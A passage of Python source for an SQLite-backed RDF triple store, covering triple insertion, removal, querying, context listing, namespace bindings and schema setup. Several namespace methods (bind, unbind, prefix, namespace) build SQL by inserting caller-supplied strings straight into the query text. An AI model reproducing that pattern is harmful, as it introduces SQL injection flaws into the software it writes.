Graph):\n context = context.identifier\n c = self._db.cursor()\n if quoted or predicate != RDF.type:\n # quoted statement or non rdf:type predicate\n # check if object is a literal\n if isinstance(obj, Literal):\n add_cmd, params = self.build_insert_literal_triple_sql_command(\n subject, predicate, obj, context, self._interned_id\n )\n else:\n add_cmd, params = self.build_insert_triple_sql_command(\n subject, predicate, obj, context, self._interned_id, quoted\n )\n elif predicate == RDF.type:\n # asserted rdf:type statement\n add_cmd, params = self.build_insert_type_statement_sql_command(\n subject, obj, context, self._interned_id\n )\n try:\n self.execute_sql(c, add_cmd, params)\n except Exception as e:\n if \"UNIQUE constraint failed\" in str(e):\n logger.info(f\"UNIQUE constraint failed for {[p for p in params[:-1]]}\")\n pass\n else:\n raise Exception(e) # pragma: no cover\n\n c.close()\n\n # Trigger the Store's TripleAdded event\n Store.add(self, triple, context, quoted)\n\n def addN(self, quads): # noqa: N802\n c = self._db.cursor()\n literal_triples = []\n type_triples = []\n other_triples = []\n literal_triple_insert_command = None\n type_triple_insert_command = None\n other_triple_insert_command = None\n for subject, predicate, obj, context in quads:\n if isinstance(context, QuotedGraph) or predicate != RDF.type:\n # quoted statement or non rdf:type predicate\n # check if object is a literal\n\n if isinstance(obj, Literal):\n cmd, params = self.build_insert_literal_triple_sql_command(\n subject, predicate, obj, context, self._interned_id\n )\n literal_triple_insert_command = (\n literal_triple_insert_command is not None\n and literal_triple_insert_command\n or cmd\n )\n literal_triples.append(params)\n\n else:\n cmd, params = self.build_insert_triple_sql_command(\n subject,\n predicate,\n obj,\n context,\n self._interned_id,\n isinstance(context, QuotedGraph),\n )\n other_triple_insert_command = (\n other_triple_insert_command is not None\n and other_triple_insert_command\n or cmd\n )\n other_triples.append(params)\n\n elif predicate == RDF.type:\n\n # asserted rdf:type statement\n cmd, params = self.build_insert_type_statement_sql_command(\n subject, obj, context, self._interned_id\n )\n type_triple_insert_command = (\n type_triple_insert_command is not None\n and type_triple_insert_command\n or cmd\n )\n type_triples.append(params)\n\n if literal_triples:\n self.execute_sql(\n c, literal_triple_insert_command, literal_triples, param_list=True\n )\n if type_triples:\n self.execute_sql(\n c, type_triple_insert_command, type_triples, param_list=True\n )\n if other_triples:\n self.execute_sql(\n c, other_triple_insert_command, other_triples, param_list=True\n )\n\n c.close()\n\n def remove(self, triple, context):\n \"\"\"Remove a triple from the store\"\"\"\n (subject, predicate, obj) = triple\n if context is not None:\n if subject is None and predicate is None and obj is None:\n self._remove_context(context)\n return\n\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n if not predicate or predicate != RDF.type:\n # Need to remove predicates other than rdf:type\n if not self.STRONGLY_TYPED_TERMS or isinstance(obj, Literal):\n\n # remove literal triple\n clause_string, params = self.build_where_clause(\n literal_table, subject, predicate, obj, context\n )\n\n cmd = f\"DELETE FROM {' '.join([literal_table, clause_string]) if clause_string else literal_table}\"\n\n self.execute_sql(c, self._normalize_sql_command(cmd), params)\n\n for table in [quoted_table, asserted_table]:\n # If asserted non rdf:type table and obj is Literal, don't do anything (already taken care of)\n if table == asserted_table and isinstance(obj, Literal):\n continue # pragma: no cover\n else:\n clause_string, params = self.build_where_clause(\n table, subject, predicate, obj, context\n )\n cmd = f\"DELETE FROM {' '.join([table, clause_string]) if clause_string else table}\"\n self.execute_sql(c, self._normalize_sql_command(cmd), params)\n\n if predicate == RDF.type or not predicate:\n # Need to check rdf:type and quoted partitions (in addition perhaps)\n clause_string, params = self.build_where_clause(\n asserted_type_table, subject, RDF.type, obj, context, True\n )\n\n cmd = f\"DELETE FROM {' '.join([asserted_type_table, clause_string]) if clause_string else asserted_type_table}\"\n\n self.execute_sql(c, self._normalize_sql_command(cmd), params)\n\n clause_string, params = self.build_where_clause(\n quoted_table, subject, predicate, obj, context\n )\n\n cmd = f\"DELETE FROM {' '.join([quoted_table, clause_string]) if clause_string else quoted_table}\"\n\n self.execute_sql(c, self._normalize_sql_command(cmd), params)\n c.close()\n # Trigger the Store's TripleRemoved event\n Store.remove(self, triple, context)\n\n def triples(self, triple, context=None):\n \"\"\"\n A generator over all the triples matching pattern. Pattern can\n be any objects for comparing against nodes in the store, for\n example, RegExLiteral, Date? DateRange?\n\n quoted table: _quoted_statements\n asserted rdf:type table: _type_statements\n asserted non rdf:type table: _asserted_statements\n\n triple columns:\n subject, predicate, object, context, termComb, objLanguage, objDatatype\n\n class membership columns:\n member,klass,context termComb\n\n FIXME: These union all selects *may* be further optimized by joins\n\n \"\"\"\n (subject, predicate, obj) = triple\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n c = self._db.cursor()\n\n parameters = []\n\n if predicate == RDF.type:\n # select from asserted rdf:type partition and quoted table (if a\n # context is specified)\n clause_string, params = self.build_where_clause(\n \"typed\", subject, RDF.type, obj, context, True\n )\n parameters.extend(params)\n selects = [\n (\n asserted_type_table,\n \"typed\",\n clause_string,\n ASSERTED_TYPE_PARTITION,\n ),\n ]\n\n elif (\n isinstance(predicate, REGEXTerm)\n and predicate.compiledExpr.match(RDF.type)\n or not predicate\n ):\n # Select from quoted partition (if context is specified), literal\n # partition if (obj is Literal or None) and asserted non rdf:type\n # partition (if obj is URIRef or None)\n selects = []\n if (\n not self.STRONGLY_TYPED_TERMS\n or isinstance(obj, Literal)\n or not obj\n or (self.STRONGLY_TYPED_TERMS and isinstance(obj, REGEXTerm))\n ):\n clause_string, params = self.build_where_clause(\n \"literal\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append(\n (\n literal_table,\n \"literal\",\n clause_string,\n ASSERTED_LITERAL_PARTITION,\n )\n )\n if (\n not isinstance(obj, Literal)\n and not (isinstance(obj, REGEXTerm) and self.STRONGLY_TYPED_TERMS)\n or not obj\n ):\n clause_string, params = self.build_where_clause(\n \"asserted\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_table,\n \"asserted\",\n clause_string,\n ASSERTED_NON_TYPE_PARTITION,\n )\n )\n\n clause_string, params = self.build_where_clause(\n \"typed\", subject, RDF.type, obj, context, True\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_type_table,\n \"typed\",\n clause_string,\n ASSERTED_TYPE_PARTITION,\n )\n )\n\n elif predicate:\n # select from asserted non rdf:type partition (optionally),\n # quoted partition (if context is speciied), and literal\n # partition (optionally)\n selects = []\n if (\n not self.STRONGLY_TYPED_TERMS\n or isinstance(obj, Literal)\n or not obj\n or (self.STRONGLY_TYPED_TERMS and isinstance(obj, REGEXTerm))\n ):\n clause_string, params = self.build_where_clause(\n \"literal\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append(\n (\n literal_table,\n \"literal\",\n clause_string,\n ASSERTED_LITERAL_PARTITION,\n )\n )\n if (\n not isinstance(obj, Literal)\n and not (isinstance(obj, REGEXTerm) and self.STRONGLY_TYPED_TERMS)\n or not obj\n ):\n clause_string, params = self.build_where_clause(\n \"asserted\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_table,\n \"asserted\",\n clause_string,\n ASSERTED_NON_TYPE_PARTITION,\n )\n )\n\n if context is not None:\n clause_string, params = self.build_where_clause(\n \"quoted\", subject, predicate, obj, context\n )\n parameters.extend(params)\n selects.append((quoted_table, \"quoted\", clause_string, QUOTED_PARTITION))\n\n q = self._normalize_sql_command(union_select(selects))\n self.execute_sql(c, q, parameters)\n rt = c.fetchone()\n while rt:\n s, p, o, (graph_class, id_cllass, graphid) = extract_triple(\n rt, self, context\n )\n current_context = graph_class(self, id_cllass(graphid))\n contexts = [current_context]\n rt = next = c.fetchone()\n same_triple = next and extract_triple(next, self, context)[:3] == (\n s,\n p,\n o,\n )\n while same_triple:\n (\n s2,\n p2,\n o2,\n (graph_class, id_cllass, graphid),\n ) = extract_triple(next, self, context)\n c2 = graph_class(self, id_cllass(graphid))\n contexts.append(c2)\n rt = next = c.fetchone()\n same_triple = next and extract_triple(next, self, context)[:3] == (\n s,\n p,\n o,\n )\n\n yield (s, p, o), (c for c in contexts)\n\n def triples_choices(self, triple, context=None):\n \"\"\"\n A variant of triples that can take a list of terms instead of a single\n term in any slot. Stores can implement this to optimize the response time\n from the import default 'fallback' implementation, which will iterate\n over each term in the list and dispatch to tripless\n \"\"\"\n (subject, predicate, object_) = triple\n if isinstance(object_, list):\n assert not isinstance(subject, list), \"object_ / subject are both lists\"\n assert not isinstance(predicate, list), \"object_ / predicate are both lists\"\n if not object_:\n object_ = None\n for (s1, p1, o1), cg in self.triples(\n (subject, predicate, object_), context\n ):\n yield (s1, p1, o1), cg\n\n elif isinstance(subject, list):\n assert not isinstance(predicate, list), \"subject / predicate are both lists\"\n if not subject:\n subject = None\n for (s1, p1, o1), cg in self.triples(\n (subject, predicate, object_), context\n ):\n yield (s1, p1, o1), cg\n\n elif isinstance(predicate, list):\n assert not isinstance(subject, list), \"predicate / subject are both lists\"\n if not predicate:\n predicate = None\n for (s1, p1, o1), cg in self.triples(\n (subject, predicate, object_), context\n ):\n yield (s1, p1, o1), cg\n\n def __repr__(self):\n try:\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n\n selects = [\n (asserted_type_table, \"typed\", \"\", ASSERTED_TYPE_PARTITION),\n (quoted_table, \"quoted\", \"\", QUOTED_PARTITION),\n (asserted_table, \"asserted\", \"\", ASSERTED_NON_TYPE_PARTITION),\n (literal_table, \"literal\", \"\", ASSERTED_LITERAL_PARTITION),\n ]\n q = union_select(selects, distinct=False, selecttype=COUNT_SELECT)\n self.execute_sql(c, self._normalize_sql_command(q))\n rt = c.fetchall()\n type_len, quoted_len, asserted_len, literal_len = [\n returned_tuple[0] for returned_tuple in rt\n ]\n return (\n \"\"\n )\n except Exception: # pragma: no cover\n return \"\"\n\n def __len__(self, context=None, count=False):\n \"\"\"Number of statements in the store.\"\"\"\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n\n parameters = []\n quoted_context = asserted_context = type_context = literal_context = None\n\n clause_parts = self.build_context_clause(context, quoted_table)\n if clause_parts:\n quoted_context, params = clause_parts\n parameters.extend([p for p in params if p])\n\n clause_parts = self.build_context_clause(context, asserted_table)\n if clause_parts:\n asserted_context, params = clause_parts\n parameters.extend([p for p in params if p])\n\n clause_parts = self.build_context_clause(context, asserted_type_table)\n if clause_parts:\n type_context, params = clause_parts\n parameters.extend([p for p in params if p])\n\n clause_parts = self.build_context_clause(context, literal_table)\n if clause_parts:\n literal_context, params = clause_parts\n parameters.extend([p for p in params if p])\n\n distincts = False\n selects = [\n (\n asserted_type_table,\n \"typed\",\n type_context and \"where \" + type_context or \"\",\n ASSERTED_TYPE_PARTITION,\n ),\n (\n asserted_table,\n \"asserted\",\n asserted_context and \"where \" + asserted_context or \"\",\n ASSERTED_NON_TYPE_PARTITION,\n ),\n (\n literal_table,\n \"literal\",\n literal_context and \"where \" + literal_context or \"\",\n ASSERTED_LITERAL_PARTITION,\n ),\n ]\n\n if context is not None:\n selects += [\n (\n quoted_table,\n \"quoted\",\n quoted_context and \"where \" + quoted_context or \"\",\n QUOTED_PARTITION,\n ),\n ]\n\n distincts = True # noqa: F841\n\n q = union_select(\n selects,\n # TODO: FIXME: sqlite3 fails to handle a straight UNION\n # properly, omitting the result from type assertions\n # works with UNION ALL\n distinct=False, # distincts,\n selecttype=COUNT_SELECT,\n )\n\n self.execute_sql(c, self._normalize_sql_command(q), parameters)\n rt = c.fetchall()\n c.close()\n\n return reduce(lambda x, y: x + y, [returned_tuple[0] for returned_tuple in rt])\n\n def contexts(self, triple=None):\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n\n parameters = []\n\n if triple is not None:\n if len(triple) == 4:\n (subject, predicate, obj, ctx) = triple\n elif len(triple) == 3:\n (subject, predicate, obj) = triple\n else:\n raise Exception(f\"Funny values for triple {triple}\")\n\n if predicate == RDF.type:\n # select from asserted rdf:type partition and quoted table\n # (if a context is specified)\n clause_string, params = self.build_where_clause(\n \"typed\", subject, RDF.type, obj, None, True\n )\n parameters.extend(params)\n selects = [\n (\n asserted_type_table,\n \"typed\",\n clause_string,\n ASSERTED_TYPE_PARTITION,\n ),\n ]\n\n elif (\n isinstance(predicate, REGEXTerm)\n and predicate.compiledExpr.match(RDF.type)\n or not predicate\n ):\n # Select from quoted partition (if context is specified),\n # literal partition if (obj is Literal or None) and asserted\n # non rdf:type partition (if obj is URIRef or None)\n clause_string, params = self.build_where_clause(\n \"typed\", subject, RDF.type, obj, None, True\n )\n parameters.extend(params)\n selects = [\n (\n asserted_type_table,\n \"typed\",\n clause_string,\n ASSERTED_TYPE_PARTITION,\n ),\n ]\n\n if (\n not self.STRONGLY_TYPED_TERMS\n or isinstance(obj, Literal)\n or not obj\n or (self.STRONGLY_TYPED_TERMS and isinstance(obj, REGEXTerm))\n ):\n clause_string, params = self.build_where_clause(\n \"literal\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append(\n (\n literal_table,\n \"literal\",\n clause_string,\n ASSERTED_LITERAL_PARTITION,\n )\n )\n if (\n not isinstance(obj, Literal)\n and not (isinstance(obj, REGEXTerm) and self.STRONGLY_TYPED_TERMS)\n or not obj\n ):\n clause_string, params = self.build_where_clause(\n \"asserted\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_table,\n \"asserted\",\n clause_string,\n ASSERTED_NON_TYPE_PARTITION,\n )\n )\n\n elif predicate:\n # select from asserted non rdf:type partition (optionally),\n # quoted partition (if context is speciied), and literal\n # partition (optionally)\n selects = []\n if (\n not self.STRONGLY_TYPED_TERMS\n or isinstance(obj, Literal)\n or not obj\n or (self.STRONGLY_TYPED_TERMS and isinstance(obj, REGEXTerm))\n ):\n clause_string, params = self.build_where_clause(\n \"literal\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append(\n (\n literal_table,\n \"literal\",\n clause_string,\n ASSERTED_LITERAL_PARTITION,\n )\n )\n if (\n not isinstance(obj, Literal)\n and not (isinstance(obj, REGEXTerm) and self.STRONGLY_TYPED_TERMS)\n or not obj\n ):\n clause_string, params = self.build_where_clause(\n \"asserted\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append(\n (\n asserted_table,\n \"asserted\",\n clause_string,\n ASSERTED_NON_TYPE_PARTITION,\n )\n )\n\n clause_string, params = self.build_where_clause(\n \"quoted\", subject, predicate, obj\n )\n parameters.extend(params)\n selects.append((quoted_table, \"quoted\", clause_string, QUOTED_PARTITION))\n q = union_select(selects, distinct=True, selecttype=CONTEXT_SELECT)\n else:\n selects = [\n (asserted_type_table, \"typed\", \"\", ASSERTED_TYPE_PARTITION),\n (quoted_table, \"quoted\", \"\", QUOTED_PARTITION),\n (asserted_table, \"asserted\", \"\", ASSERTED_NON_TYPE_PARTITION),\n (literal_table, \"literal\", \"\", ASSERTED_LITERAL_PARTITION),\n ]\n q = union_select(selects, distinct=True, selecttype=CONTEXT_SELECT)\n\n self.execute_sql(c, self._normalize_sql_command(q), parameters)\n rt = c.fetchall()\n for context in [returned_tuple[0] for returned_tuple in rt]:\n yield URIRef(context)\n c.close()\n\n def _remove_context(self, identifier):\n \"\"\" \"\"\"\n # assert identifier\n c = self._db.cursor()\n quoted_table = f\"{self._interned_id}_quoted_statements\"\n asserted_table = f\"{self._interned_id}_asserted_statements\"\n asserted_type_table = f\"{self._interned_id}_type_statements\"\n literal_table = f\"{self._interned_id}_literal_statements\"\n\n for table in [quoted_table, asserted_table, asserted_type_table, literal_table]:\n\n clause_string, params = self.build_context_clause(identifier, table)\n\n self.execute_sql(\n c,\n self._normalize_sql_command(\n f\"DELETE from {table} WHERE {clause_string}\"\n ),\n [p for p in params if p],\n )\n\n c.close()\n\n # Optional Namespace methods\n\n def subjects(self, predicate=None, obj=None):\n \"\"\"\n A generator of subjects with the given predicate and object.\n \"\"\"\n raise Exception(\"Not implemented\")\n\n # capable of taking a list of predicate terms instead of a single term\n def objects(self, subject=None, predicate=None):\n \"\"\"\n A generator of objects with the given subject and predicate.\n \"\"\"\n raise Exception(\"Not implemented\")\n\n # optimized interfaces (others)\n def predicate_objects(self, subject=None):\n \"\"\"\n A generator of (predicate, object) tuples for the given subject\n \"\"\"\n raise Exception(\"Not implemented\")\n\n def subject_objects(self, predicate=None):\n \"\"\"\n A generator of (subject, object) tuples for the given predicate\n \"\"\"\n raise Exception(\"Not implemented\")\n\n def subject_predicates(self, object=None):\n \"\"\"\n A generator of (subject, predicate) tuples for the given object\n \"\"\"\n raise Exception(\"Not implemented\")\n\n def value(\n self,\n subject,\n predicate=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#value\",\n object=None,\n default=None,\n any=False,\n ):\n \"\"\"\n Get a value for a subject/predicate, predicate/object, or\n subject/object pair -- exactly one of subject, predicate,\n object must be None. Useful if one knows that there may only\n be one value.\n\n It is one of those situations that occur a lot, hence this\n 'macro' like utility\n\n Parameters:\n -----------\n subject, predicate, object -- exactly one must be None\n default -- value to be returned if no values found\n any -- if True:\n return any value in the case there is more than one\n else:\n raise UniquenessError\"\"\"\n raise Exception(\"Not implemented\")\n\n # Namespace persistence interface implementation\n def bind(self, prefix, namespace, override=True):\n \"\"\" \"\"\"\n c = self._db.cursor()\n try:\n c.execute(\n \"INSERT INTO %s_namespace_binds VALUES ('%s', '%s')\"\n % (self._interned_id, prefix, namespace)\n )\n except Exception: # pragma: no cover\n pass\n c.close()\n\n # Namespace persistence interface implementation\n def unbind(self, prefix):\n \"\"\" \"\"\"\n c = self._db.cursor()\n try:\n c.execute(\n f\"\"\"DELETE FROM {self._interned_id}_namespace_binds WHERE prefix=\"{prefix}\";\"\"\"\n )\n except Exception: # pragma: no cover\n pass\n c.close()\n\n def prefix(self, namespace):\n \"\"\" \"\"\"\n c = self._db.cursor()\n c.execute(\n f'select prefix from {self._interned_id}_namespace_binds where uri = \"{namespace}\"'\n )\n rt = [returned_tuple[0] for returned_tuple in c.fetchall()]\n c.close()\n return rt and rt[0] or None\n\n def namespace(self, prefix):\n \"\"\" \"\"\"\n c = self._db.cursor()\n try:\n c.execute(\n f'select uri from {self._interned_id}_namespace_binds where prefix = \"{prefix}\"'\n )\n except Exception: # pragma: no cover\n return None\n rt = [returned_tuple[0] for returned_tuple in c.fetchall()]\n c.close()\n return rt and rt[0] or None\n\n def namespaces(self):\n \"\"\" \"\"\"\n c = self._db.cursor()\n c.execute(\n f\"select prefix, uri from {self._interned_id}_namespace_binds where 1;\"\n )\n\n rt = c.fetchall()\n c.close()\n for prefix, uri in rt:\n yield prefix, uri\n\n # Transactional interfaces\n def commit(self):\n \"\"\" \"\"\"\n self._db.commit()\n\n def rollback(self):\n \"\"\" \"\"\"\n self._db.rollback()\n\n\ntable_name_prefixes = [\n \"%s_asserted_statements\",\n \"%s_type_statements\",\n \"%s_quoted_statements\",\n \"%s_namespace_binds\",\n \"%s_literal_statements\",\n]\n\n\n# User-defined REGEXP operator\ndef regexp(expr, item):\n r = re.compile(expr)\n return r.match(item) is not None\n\n\n# Helper function for executing EXPLAIN on all dispatched SQL statements - for the pupose of analyzing\n# index usage\ndef query_analysis(query, store, cursor):\n cursor.execute(store._normalize_sql_command(\"explain \" + query))\n rt = cursor.fetchall()[0]\n (addr, opcode, p1, p2, p3, p4, p5, comment) = rt\n # if not _key:\n # assert jointype == \"ALL\"\n # if not hasattr(store, \"queryOptMarks\"):\n # store.queryOptMarks = {}\n # hits = store.queryOptMarks.get((\"FULL SCAN\", table), 0)\n # store.queryOptMarks[(\"FULL SCAN\", table)] = hits + 1\n\n # if not hasattr(store, \"queryOptMarks\"):\n # store.queryOptMarks = {}\n # hits = store.queryOptMarks.get((_key, table), 0)\n # store.queryOptMarks[(_key, table)] = hits + 1\n\n\nclass SQLiteStore(AbstractSQLStore):\n \"\"\"\n SQLite store formula-aware implementation. It stores its triples in the\n following partitions:\n\n - Asserted non rdf:type statements\n - Asserted rdf:type statements (in a table which models Class membership)\n The motivation for this partition is primarily query speed and\n scalability as most graphs will always have more rdf:type statements\n than others\n - All Quoted statements\n\n In addition it persists namespace mappings in a seperate table\n \"\"\"\n\n context_aware = True\n graph_aware = True\n formula_aware = True\n transaction_aware = True\n regex_matching = PYTHON_REGEX\n autocommit_default = False\n configuration = Literal(\"sqlite://\")\n\n def is_open(self):\n try:\n self._db.cursor()\n return True\n except Exception:\n return False\n\n def open(self, path, create=True):\n \"\"\"\n Opens the store specified by the configuration string. If\n create is True a store will be created if it does not already\n exist. If create is False and a store does not already exist\n an exception is raised. An exception is also raised if a store\n exists, but there is insufficient permissions to open the\n store.\"\"\"\n self.configuration = home = path\n if create:\n if os.path.exists(home):\n raise Exception(\n f\"sqlite3 database file {home} exists, please move it or delete it.\"\n )\n db = sqlite3.connect(home)\n c = db.cursor()\n c.execute(CREATE_ASSERTED_STATEMENTS_TABLE % (self._interned_id))\n c.execute(CREATE_ASSERTED_TYPE_STATEMENTS_TABLE % (self._interned_id))\n c.execute(CREATE_QUOTED_STATEMENTS_TABLE % (self._interned_id))\n c.execute(CREATE_NS_BINDS_TABLE % (self._interned_id))\n c.execute(CREATE_LITERAL_STATEMENTS_TABLE % (self._interned_id))\n self.tables = dict()\n for tablename, indices in [\n (\n \"%s_asserted_statements\",\n [\n (\"%s_A_termComb_index\", (\"termComb\",)),\n (\"%s_A_s_index\", (\"subject\",)),\n (\"%s_A_p_index\", (\"predicate\",)),\n (\"%s_A_o_index\", (\"object\",)),\n (\"%s_A_c_index\", (\"context\",)),\n ],\n ),\n (\n \"%s_type_statements\",\n [\n (\"%s_T_termComb_index\", (\"termComb\",)),\n (\"%s_member_index\", (\"member\",)),\n (\"%s_klass_index\", (\"klass\",)),\n (\"%s_c_index\", (\"context\",)),\n ],\n ),\n (\n \"%s_literal_statements\",\n [\n (\"%s_L_termComb_index\", (\"termComb\",)),\n (\"%s_L_s_index\", (\"subject\",)),\n (\"%s_L_p_index\", (\"predicate\",)),\n (\"%s_L_c_index\", (\"context\",)),\n ],\n ),\n (\n \"%s_quoted_statements\",\n [\n (\"%s_Q_termComb_index\", (\"termComb\",)),\n (\"%s_Q_s_index\", (\"subject\",)),\n (\"%s_Q_p_index\", (\"predicate\",)),\n (\"%s_Q_o_index\", (\"object\",)),\n (\"%s_Q_c_index\", (\"context\",)),\n ],\n ),\n (\n \"%s_namespace_binds\",\n [\n (\"%s_uri_index\", (\"uri\",)),\n ],\n ),\n ]:\n for indexname, columns in indices:\n c.execute(\n \"CREATE INDEX %s on %s (%s)\"\n % (\n indexname % self._interned_id,\n tablename % (self._interned_id),\n \", \".join(columns),\n )\n )\n self.tables[tablename.split(\"_\", 1)[1]] = tablename % (\n self._interned_id\n )\n c.close()\n db.commit()\n db.close()\n\n if os.path.exists(home):\n if self.autocommit_default:\n self._db = sqlite3.connect(home, isolation_level=None)\n else:\n self._db = sqlite3.connect(home)\n\n self._db.create_function(\"regexp\", 2, regexp)\n\n # Alternatively:\n # self._db.create_function('regexp', 2, lambda x, y: 1 if re.search(x, y) else 0)\n\n c = self._db.cursor()\n c.execute(\"SELECT * FROM sqlite_master WHERE type='table'\")\n tbls = [rt[1] for rt in c.fetchall()]\n c.close()\n for tn in [tbl % (self._interned_id) for tbl in table_name_prefixes]:\n if tn not in tbls:\n # The database exists, but one of the partitions doesn't exist\n return 0\n # Everything is there (the database and the partitions)\n self.graph_aware = True\n self.context_aware = True\n self.formula_aware = True\n return 1\n else:\n return -1\n\n def perform_query_analysis(self, query):\n query_analysis(query, self, self._db.cursor())\n\n def destroy(self, configuration=None):\n try:\n os.remove(self.configuration if configuration is None else configuration)\n except FileNotFoundError:\n pass\n\n # Where Clause utility functions\n\n # The predicate and object clause builders are modified in order to\n # optimize subjects and objects utility functions which can take lists as\n # their last argument (object, predicate - respectively)\n def build_term_clause(self, term, pos, tablename):\n tablename = f\"{pos}\" if tablename is None else f\"{tablename}.{pos}\"\n if isinstance(term, REGEXTerm):\n return f\" REGEXP (%s, {tablename})\", [term]\n elif isinstance(term, list):\n clausestrings = []\n paramstrings = []\n for tm in term:\n if isinstance(tm, REGEXTerm):\n clausestrings.append(f\" REGEXP (%s, {tablename})\")\n paramstrings.append(self.normalize_term(tm))\n elif isinstance(tm, Graph):\n if pos == \"predicate\":\n raise ValueError(\"Predicate cannot be a Graph!\")\n else:\n clausestrings.append(f\"{tablename} = %s\")\n paramstrings.append(self.normalize_term(tm.identifier))\n else:\n clausestrings.append(f\"{tablename} = %s\")\n paramstrings.append(self.normalize_term(tm))\n return \"(\" + \" or \".join(clausestrings) + \")\", paramstrings\n elif isinstance(term, Graph):\n if pos == \"predicate\":\n raise ValueError(\"Predicate cannot be a Graph!\")\n else:\n return f\"{tablename} = %s\", [self.normalize_term(term.identifier)]\n else:\n return (\n term is not None and f\"{tablename} = %s\",\n [term] or None,\n )\n\n def build_subject_clause(self, subject, tablename):\n return self.build_term_clause(subject, \"subject\", tablename)\n\n def build_predicate_clause(self, predicate, tablename):\n return self.build_term_clause(predicate, \"predicate\", tablename)\n\n def build_object_clause(self, obj, tablename):\n return self.build_term_clause(obj, \"object\", tablename)\n\n def build_context_clause(self, ctx, tablename):\n \"\"\"\n Return SQL clause:\n\n context and tablename: “kb_bec6803d52_quoted_statements.context=%s”\n\n None and tablename: “False”\n\n context and None: “context=%s”\n\n \"\"\"\n\n tablename = \"context\" if tablename is None else f\"{tablename}.context\"\n if ctx is not None:\n ctx = self.normalize_term(ctx)\n if isinstance(ctx, REGEXTerm):\n return f\" REGEXP (%s, {tablename})\", [ctx]\n else:\n return (\n ctx is not None and f\"{tablename} = %s\",\n [ctx] or None,\n )\n\n def build_type_clause(self, term, pos, tablename):\n tablename = f\"{pos}\" if tablename is None else f\"{tablename}.{pos}\"\n if isinstance(term, REGEXTerm):\n return f\" REGEXP (%s, {tablename})\", [term]\n elif isinstance(term, list):\n clausestrings = []\n paramstrings = []\n for tm in term:\n clausestrings.append(f\"{tablename} = %s\")\n if isinstance(tm, Graph):\n paramstrings.append(self.normalize_term(tm.identifier))\n else:\n paramstrings.append(self.normalize_term(tm))\n return \"(\" + \" or \".join(clausestrings) + \")\", paramstrings\n else:\n return term is not None and f\"{tablename} = %s\", [term] or None\n\n def build_type_member_clause(self, subj, tablename):\n return self.build_type_clause(subj, \"member\", tablename)\n\n def build_type_class_clause(self, obj, tablename):\n return self.build_type_clause(obj, \"klass\", tablename)\n\n def __iter__(self):\n def triples_to_quads():\n for (s, p, o), cg in self.triples((None, None, None), context=None):\n for c in cg:\n yield s, p, o, c.identifier if isinstance(c, Graph) else c\n\n return iter(triples_to_quads())\n\n def dumpdb(self):\n return \"\\n\".join(line for line in self._db.iterdump())\n\n def add_graph(self, graph):\n \"\"\"Non-op, contexts are implicit in the underpinning quadstore\"\"\"\n assert self._db.cursor(), \"The Store must be open.\"\n # Pending Dataset re-work\n if graph is None:\n pass\n elif isinstance(graph, Graph):\n for triple in list(graph):\n self.add(triple, context=self.identifier)\n elif isinstance(graph, (Graph, type(None))):\n raise TypeError(f\"\"\"graph identifier cannot be {type(graph)}\"\"\")\n\n def remove_graph(self, graph):\n assert self._db.cursor(), \"The Store must be open.\"\n if isinstance(graph, (Graph, type(None))):\n raise TypeError(f\"\"\"graph identifier cannot be {type(graph)}\"\"\")\n self.remove((None, None, None), graph)\n\n\nCREATE_ASSERTED_STATEMENTS_TABLE = \"\"\"\nCREATE TABLE %s_asserted_statements (\n subject text not NULL,\n predicate text not NULL,\n object text not NULL,\n context text not NULL,\n termComb tinyint unsigned not NULL,\n UNIQUE(subject, predicate, object, context, termComb)\n )\"\"\"\n\nCREATE_ASSERTED_TYPE_STATEMENTS_TABLE = \"\"\"\nCREATE TABLE %s_type_statements (\n member text not NULL,\n klass text not NULL,\n context text not NULL,\n termComb tinyint unsigned not NULL,\n UNIQUE(member, klass, context, termComb)\n )\"\"\"\n\nCREATE_LITERAL_STATEMENTS_TABLE = \"\"\"\nCREATE TABLE %s_literal_statements (\n subject text not NULL,\n predicate text not NULL,\n object text,\n context text not NULL,\n termComb tinyint unsigned not NULL,\n objLanguage varchar(3),\n objDatatype text,\n UNIQUE(subject, predicate, object, context, termComb, objLanguage, objDatatype)\n )\"\"\"\n\nCREATE_QUOTED_STATEMENTS_TABLE = \"\"\"\nCREATE TABLE %s_quoted_statements (\n subject text not NULL,\n predicate text not NULL,\n object text,\n context text not NULL,\n termComb tinyint unsigned not NULL,\n objLanguage varchar(3),\n objDatatype text,\n UNIQUE(subject, predicate, object, context, termComb, objLanguage, objDatatype)\n )\"\"\"\n\nCREATE_NS_BINDS_TABLE = \"\"\"\nCREATE TABLE %s_namespace_binds (\n prefix varchar(20) UNIQUE not NULL,\n uri text,\n PRIMARY KEY (prefix))\"\"\"\n","sub_path":"FuXi/sqlstore/sqlitestore.py","file_name":"sqlitestore.py","file_ext":"py","file_size_in_byte":67641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
